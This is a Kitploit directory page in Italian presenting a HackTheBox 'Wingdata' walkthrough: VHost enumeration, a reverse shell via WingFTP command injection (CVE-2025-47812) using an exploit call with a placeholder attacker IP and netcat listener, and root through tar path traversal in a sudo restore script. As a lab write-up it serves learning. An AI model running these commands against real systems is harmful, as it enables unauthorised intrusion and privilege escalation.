Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/ledksv/wingdata
Escalation di PrivilegiRicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitCTFPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubledksv/wingdata

wingdata

10h 51m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Walkthrough di HackTheBox Wingdata che copre l'iniezione di comandi di WingFTP CVE-2025-47812 per l'accesso iniziale e l'escalation di privilegi sudo tramite path traversal di tar fino a root.

Vedi Repository

Wingdata — HackTheBox Walkthrough

Piattaforma: HackTheBox | OS: Linux

Catena di attacco

L'enumerazione dei VHost individua un server WingFTP. L'iniezione di comandi CVE-2025-47812 fornisce l'accesso iniziale. Root tramite uno script Python di ripristino eseguito con sudo che estrae un archivio tar appositamente creato — il path traversal di tar scrive un file arbitrario come root.

Enumerazione

root@kitploit:~
nmap -sC -sV wingdata.htb -Pn

22/tcp open  ssh   OpenSSH
80/tcp open  http  wingdata.htb main site

Aggiunto wingdata.htb a /etc/hosts. La porta 80 faceva riferimento a un dominio che indicava virtual hosting.

Scoperta dei VHost

root@kitploit:~
ffuf -u http://wingdata.htb -H 'Host: FUZZ.wingdata.htb' \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -ac

Trovato: ftp.wingdata.htb — interfaccia web di WingFTP Server.

CVE-2025-47812 — Iniezione di comandi in WingFTP

CVE-2025-47812 è una vulnerabilità di iniezione di comandi nell'interfaccia web di WingFTP Server. Un parametro non sanificato consente di ottenere una reverse shell.

root@kitploit:~
nc -lvnp 4444
python3 exploit_CVE-2025-47812.py --target http://ftp.wingdata.htb --lhost <ATTACKER_IP> --lport 4444

Shell ottenuta. Flag utente recuperata.

PrivEsc — Path Traversal di tar

root@kitploit:~
sudo -l
# (root) NOPASSWD: /usr/bin/python3 /opt/restore.py

/opt/restore.py accetta un archivio tar e lo estrae come root. tar non sanifica i percorsi — un archivio appositamente creato con ../ nel nome del file scrive file al di fuori della directory di estrazione.

root@kitploit:~
python3 craft_tar.py
sudo /usr/bin/python3 /opt/restore.py -b backup_888.tar

Shell root ottenuta. Flag root in /root/root.txt.


A scopo puramente didattico. Testare solo sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione.

Scarica lo strumento